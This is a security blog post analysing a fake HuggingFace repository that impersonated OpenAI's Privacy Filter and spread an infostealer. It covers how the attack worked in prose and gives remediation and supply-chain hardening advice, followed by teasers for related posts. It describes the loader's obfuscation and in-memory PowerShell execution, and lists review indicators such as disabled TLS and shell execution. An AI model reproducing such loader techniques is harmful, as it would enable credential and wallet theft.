Fake OpenAI Model on HuggingFace Exposes AI Supply Chain Risks

A malicious repository impersonating OpenAI’s Privacy Filter model quietly climbed HuggingFace’s trending list, accumulating roughly 244,000 downloads before anyone realized it was distributing an infostealer.

This is not a one-off curiosity. It’s a clear demonstration that AI model hubs now sit squarely in the same supply chain risk category as npm, PyPI, and other public code registries.

What happened

An attacker published a HuggingFace repository named Open-OSS/privacy-filter, closely typosquatting OpenAI’s legitimate Privacy Filter project. The model card text was copied almost verbatim, giving the repository instant credibility to anyone skimming the page or trusting the brand association.

The malicious payload lived in a file called loader.py. On a quick glance, it contained enough AI-adjacent boilerplate to look like a normal model loader. Under the surface, it did three critical things:

Disabled SSL verification – removing a key integrity and confidentiality control for network traffic.
Decoded a base64-encoded URL – hiding the true destination of the next-stage payload.
Fetched a JSON payload containing a PowerShell command – which was then executed in memory, avoiding obvious on-disk artifacts.

The final stage was a Rust-based infostealer. Once executed, it targeted:

Chromium and Gecko-based browsers: cookies, saved passwords, encryption keys, browsing history, and active session tokens.
Cryptocurrency wallets: wallet data and seed phrases.
Browser-accessible credential stores: any credentials that the browser could reach.

If you pulled code or files from this repository onto a machine, the only defensible response is to treat that host as fully compromised.

Why this worked

HuggingFace’s trust model, like many community platforms, leans heavily on reputation and engagement signals:

Familiar project names and namespaces
Download counts
Stars, likes, and trending status

By cloning OpenAI’s Privacy Filter model card and using a near-identical repository name, the attacker piggybacked on OpenAI’s brand trust. Once the repository began to receive downloads—whether from search results, scripts, or direct links—the platform’s trending algorithm amplified it further.

This is the same pattern we’ve seen for years in:

npm: typosquatted package names and malicious post-install scripts
PyPI: lookalike libraries with credential stealers or cryptominers
GitHub Actions: workflows pulling unvetted actions by name or tag

No zero-day was required. The attacker combined:

A convincing clone of a well-known project’s presentation
Boilerplate code that passes a superficial review
Patience while the download counter climbed high enough to look “trusted”

HuggingFace has now joined the list of critical software supply chain surfaces.

What HiddenLayer found

HiddenLayer researchers identified and reported the campaign on May 7, roughly two days after the repository started accumulating significant downloads. Their findings align with a broader trend: by their estimate, 35% of AI-related breaches in 2025 originated from malware in public repositories.

Key points from their analysis:

The original OpenAI Privacy Filter is a legitimate model.
The malicious repository copied the model card text nearly verbatim, making it visually indistinguishable to most users.
Without checksum or cryptographic signature verification, there was no easy way for a casual user to spot that they were pulling from an attacker-controlled repo instead of the real one.

This is exactly why integrity verification and provenance controls are becoming mandatory for AI infrastructure.

Immediate actions if you might be affected

If you downloaded or executed anything from the fake Open-OSS/privacy-filter repository, you should assume compromise. Recommended steps:

Reimage the machine
- Perform a full OS reinstall or restore from a known-good, pre-incident image.
- Do not rely solely on cleaning tools; treat the host as untrusted until rebuilt.
Rotate all credentials
- Change passwords for:
  - Email accounts
  - Developer platforms (GitHub, GitLab, HuggingFace, etc.)
  - Cloud providers (AWS, GCP, Azure, etc.)
  - Internal corporate services (VPN, SSO, admin portals)
- Revoke and reissue API keys, tokens, and SSH keys used from that machine.
Replace cryptocurrency wallets
- Generate new wallets and seed phrases.
- Move funds from any potentially exposed wallets to newly created ones.
Invalidate browser sessions
- Log out of all major services from all devices.
- Use account security pages (Google, Microsoft, GitHub, etc.) to revoke active sessions and tokens.
Monitor for suspicious activity
- Watch for:
  - Unrecognized logins or devices
  - Unexpected MFA prompts
  - New SSH keys or OAuth apps added to accounts

What to do now if you use HuggingFace in pipelines

Even if you were not directly impacted, this incident is a warning shot. If your team consumes models from HuggingFace, treat it like any other third-party code registry.

1. Pin by immutable identifiers

Do not rely solely on repository names or tags.

Pin models by commit hash or SHA256 checksum of the artifacts.
Maintain an internal registry of approved model digests.

2. Treat loaders and scripts as untrusted code

Any of the following should be considered high-risk and manually reviewed before execution:

loader.py
setup.py
install.sh or other shell scripts
Custom inference.py or wrapper scripts

Look specifically for:

Network calls to unexpected domains
Disabled SSL/TLS verification
Base64 or other obfuscated strings
Shell, PowerShell, or subprocess execution

3. Lock down your Python and runtime environments

Use virtual environments or containers for model experimentation.
Maintain a whitelist of allowed packages and sources.
Periodically audit installed packages and dependencies for anything that:
- Originates from a repository you don’t recognize
- Was added during the May 7–9 window (for this incident specifically)

4. Monitor browser and credential stores

If you downloaded models or code from HuggingFace during May 7–9, and especially if you executed any loaders or scripts:

Check browser credential stores for:
- Unexpected saved passwords
- New or suspicious extensions
Review account security logs for unusual logins or token usage.

The bigger picture: AI model supply chain security

The HuggingFace incident underscores a broader shift: AI models are now part of your software supply chain. That means they deserve the same controls you already apply to open-source libraries and containers.

Key practices to adopt:

Provenance and signing
- Prefer models with verifiable signatures or checksums published by trusted maintainers.
- Push vendors and platforms to support end-to-end signed artifacts.
Internal model registries
- Mirror and vet external models into an internal registry.
- Only allow production systems to pull from this curated source, not directly from public hubs.
Policy and governance
- Define clear rules for:
  - Who can introduce new external models
  - What review is required (security, legal, compliance)
  - How updates and deprecations are handled
Continuous monitoring
- Integrate model downloads and loader execution into your existing security monitoring.
- Alert on unexpected outbound connections from inference or training nodes.

The attack surface around AI infrastructure will not shrink. As more organizations standardize on HuggingFace and similar platforms, adversaries will continue to invest in model-level and repository-level attacks.

If you’re responsible for AI infrastructure, now is the time to fold model supply chain controls into your broader security program—before the next “trending” model quietly becomes your next breach.

Gigia Tsiklauri is a Security Architect and founder of Infosec.ge. Get in touch if you work in AI infrastructure security or want to discuss model supply chain controls.

AI SecurityAgentic AIPrompt Injectionllm-security

Prompts Become Shells: How Prompt Injection Turned Two Semantic Kernel Bugs into Host-Level RCE

Two now-patched Semantic Kernel vulnerabilities (CVE-2026-26030 and CVE-2026-25592) show how prompt injection plus unsafe plugin design can lead to host-level RCE. Learn what went wrong, whether you’re affected, and how to harden your AI agent architecture.

May 9, 2026

AI SecurityAnthropicLLMDual UseOT Security

The AI cyber race: what GPT-5.5-Cyber and Mythos mean for defenders

OpenAI expanded access to GPT-5.5-Cyber on May 7, one day after the UK AI Security Institute published side-by-side results showing it nearly matches Anthropic's restricted Mythos Preview. Both labs now run dual-use AI cyber programs with vetted-access gates. Here is what that means if you are a defender trying to get your hands on these tools.

May 8, 2026

Irancredential-theftendpoint-securityVulnerability Research

MuddyWater’s Teams Trick: How Iran Uses Ransomware as Cover for Espionage

Rapid7 found that an intrusion attributed with moderate confidence to MuddyWater, Iran’s MOIS-linked APT, used Microsoft Teams social engineering to steal credentials and bypass MFA, then deployed Chaos ransomware as a false flag while the real objective was espionage and persistent access.

May 7, 2026